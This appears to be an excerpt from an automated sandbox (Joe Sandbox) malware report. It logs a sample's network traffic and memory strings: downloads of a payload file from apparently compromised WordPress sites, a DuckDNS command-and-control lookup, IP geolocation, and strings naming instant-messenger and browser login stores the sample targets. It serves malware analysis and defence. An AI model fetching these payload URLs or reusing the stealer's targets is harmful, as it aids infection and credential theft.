                      Source: global trafficHTTP traffic detected: GET /os/transportment.pfm HTTP/1.1Host: asociatiatraditiimaria.ro
                      Source: global trafficHTTP traffic detected: GET /wp-admin/oserve/transportment.pfm HTTP/1.1Host: new.quranushaiqer.org.saConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                      Source: Joe Sandbox ViewIP Address: 93.113.54.56 93.113.54.56
                      Source: Joe Sandbox ViewIP Address: 192.253.251.227 192.253.251.227
                      Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                      Source: Joe Sandbox ViewASN Name: THORDC-ASIS THORDC-ASIS
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: global trafficHTTP traffic detected: GET /os/transportment.pfm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: asociatiatraditiimaria.roConnection: Keep-Alive
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_0041B380 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_0041B380
                      Source: global trafficHTTP traffic detected: GET /os/transportment.pfm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: asociatiatraditiimaria.roConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /os/transportment.pfm HTTP/1.1Host: asociatiatraditiimaria.ro
                      Source: global trafficHTTP traffic detected: GET /wp-admin/oserve/transportment.pfm HTTP/1.1Host: new.quranushaiqer.org.saConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000002.4555963712.0000000003810000.00000040.10000000.00040000.00000000.sdmp, 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000006.00000002.2174707883.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000006.00000002.2174707883.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000004.00000002.2198414085.0000000002238000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000004.00000002.2198414085.0000000002238000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000002.4554798686.0000000002DC0000.00000040.10000000.00040000.00000000.sdmp, 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000002.4554798686.0000000002DC0000.00000040.10000000.00040000.00000000.sdmp, 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                      Source: global trafficDNS traffic detected: DNS query: iwarsut775laudrye2.duckdns.org
                      Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                      Source: global trafficDNS traffic detected: DNS query: asociatiatraditiimaria.ro
                      Source: global trafficDNS traffic detected: DNS query: new.quranushaiqer.org.sa
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://asociatiatraditiimaria.ro/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkeddate: Fri, 26 Jul 2024 13:47:10 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://asociatiatraditiimaria.ro/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkeddate: Fri, 26 Jul 2024 13:47:16 GMTserver: LiteSpeed
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: http://cacerts.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crt0
                      Source: powershell.exe, 0000000B.00000002.4564122070.0000000007581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mB
                      Source: powershell.exe, 0000000B.00000002.4564412746.0000000007706000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                      Source: powershell.exe, 00000007.00000002.4567700425.0000000006D69000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.4552699626.0000000003221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                      Source: powershell.exe, 00000007.00000002.4572916909.0000000007E87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft.
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: http://crl3.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0H
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: http://crl4.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0
                      Source: wscript.exe, 00000003.00000002.2188017878.000000000345D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2183776181.0000000003450000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                      Source: 77EC63BDA74BD0D0E0426DC8F80085060.3.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                      Source: wscript.exe, 00000003.00000003.2167892125.0000000005CFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?378b40adf3637
                      Source: wscript.exe, 00000003.00000002.2188017878.000000000345D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2183776181.0000000003450000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabxn
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000003.2139093397.0000000000782000.00000004.00000020.00020000.00000000.sdmp, bhvF6CA.tmp.4.drString found in binary or memory: http://geoplugin.net/json.gp
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeString found in binary or memory: http://geoplugin.net/json.gp/C
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000003.2139093397.000000000076F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpRN
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000003.2139093397.0000000000782000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gplA
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000003.2139093397.000000000076F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpp
                      Source: powershell.exe, 00000007.00000002.4562647784.0000000005207000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: http://ocsp.digicert.com0
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: http://ocsp.digicert.com0:
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: http://ocsp.digicert.com0H
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: http://ocsp.digicert.com0I
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: http://ocsp.digicert.com0Q
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: http://ocsp.msocsp.com0
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: http://ocsp.msocsp.com0S
                      Source: powershell.exe, 00000007.00000002.4555869381.00000000042F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 00000007.00000002.4555869381.00000000041A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.4555101569.0000000004C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000007.00000002.4555869381.00000000042F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: http://www.digicert.com/CPS0
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: http://www.digicert.com/CPS0~
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000006.00000002.2174707883.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000006.00000003.2174423035.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000006.00000003.2174273348.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000006.00000002.2174707883.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000002.4555963712.0000000003810000.00000040.10000000.00040000.00000000.sdmp, 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000006.00000002.2174707883.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000006.00000003.2174423035.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000006.00000003.2174273348.00000000005CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.compData
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000002.4555963712.0000000003810000.00000040.10000000.00040000.00000000.sdmp, 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000006.00000002.2174707883.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000004.00000002.2197446260.0000000000193000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000006.00000002.2174707883.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=EL
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
                      Source: powershell.exe, 00000007.00000002.4555869381.00000000041A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.4555101569.0000000004C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                      Source: powershell.exe, 00000007.00000002.4555869381.0000000004538000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.4555869381.000000000448F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.w.org/
                      Source: powershell.exe, 00000007.00000002.4555869381.00000000042F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://asociatiatraditiimaria.ro
                      Source: powershell.exe, 00000007.00000002.4562647784.000000000534C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.4562647784.00000000051A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://asociatiatraditiimaria.ro/comments/feed/
                      Source: powershell.exe, 00000007.00000002.4562647784.000000000534C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.4562647784.00000000051A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://asociatiatraditiimaria.ro/feed/
                      Source: powershell.exe, 00000007.00000002.4555869381.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.4555101569.0000000004DE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://asociatiatraditiimaria.ro/os/transportment.pfm
                      Source: powershell.exe, 00000007.00000002.4562647784.000000000534C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.4562647784.00000000051A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://asociatiatraditiimaria.ro/wp-content/plugins/elementor/assets/css/frontend-lite.min.css?ver=
                      Source: powershell.exe, 00000007.00000002.4562647784.000000000534C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.4562647784.00000000051A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://asociatiatraditiimaria.ro/wp-content/themes/astra/assets/css/minified/main.min.css?ver=4.7.2
                      Source: powershell.exe, 00000007.00000002.4562647784.000000000534C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.4562647784.00000000051A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://asociatiatraditiimaria.ro/wp-content/uploads/elementor/css/post-2731.css?ver=1720763767
                      Source: powershell.exe, 00000007.00000002.4562647784.000000000534C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.4562647784.00000000051A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://asociatiatraditiimaria.ro/wp-includes/css/dist/block-library/style.min.css?ver=6.6.1
                      Source: powershell.exe, 00000007.00000002.4555869381.0000000004538000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.4555869381.000000000448F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://asociatiatraditiimaria.ro/wp-json/
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
                      Source: powershell.exe, 00000007.00000002.4562647784.0000000005207000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000007.00000002.4562647784.0000000005207000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000007.00000002.4562647784.0000000005207000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5c&
                      Source: powershell.exe, 00000007.00000002.4562647784.000000000534C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.4562647784.00000000051A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Nunito
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: https://fp-afd.azureedge.net/apc/trans.gif?0684adfa5500b3bab63593997d26215c
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: https://fp-afd.azureedge.net/apc/trans.gif?79b1312614e5ac304828ba5e1fdb4fa3
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?7ae939fc98ce1346dd2e496abdba2d3b
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?9f3db9405f1b2793ad8d8de9770248e4
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?4aec53910de6415b25f2c4faf3f7e54a
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?77290711a5e44a163ac2e666ad7b53fd
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: https://fp.msedge.net/conf/v1/asgw/fpconfig.min.json
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
                      Source: powershell.exe, 00000007.00000002.4555869381.00000000042F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 00000007.00000002.4562647784.000000000534C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.4562647784.00000000051A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gmpg.org/xfn/11
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeString found in binary or memory: https://login.yahoo.com/config/login
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
                      Source: powershell.exe, 00000007.00000002.4555869381.0000000004538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://new.quranushaiqer.org.sa
                      Source: powershell.exe, 00000007.00000002.4555869381.00000000042F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://new.quranushaiqer.org.sa/wp-admin/oserve/transportment.pfm0
                      Source: powershell.exe, 0000000B.00000002.4555101569.0000000004DE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://new.quranushaiqer.org.sa/wp-admin/oserve/transportment.pfml
                      Source: powershell.exe, 00000007.00000002.4562647784.0000000005207000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-06-30-24/PreSignInSettingsConfig.json?One
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-06-40-12/PreSignInSettingsConfig.json
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=14d1c105224b3e736c3c
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/741e3e8c607c445262f3add0e58b18f19e0502af.xml?OneDriveUpdate=7fe112
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-3a99f64809c6780df035.js
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ac5cfbeadfd63fc27ffd.chunk.v7.js
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.68ab311bcca4f86f9ef5.chunk.v7.js
                      Source: bhvF6CA.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.2ce72562ad7c0ae7059c.chunk.v7.js
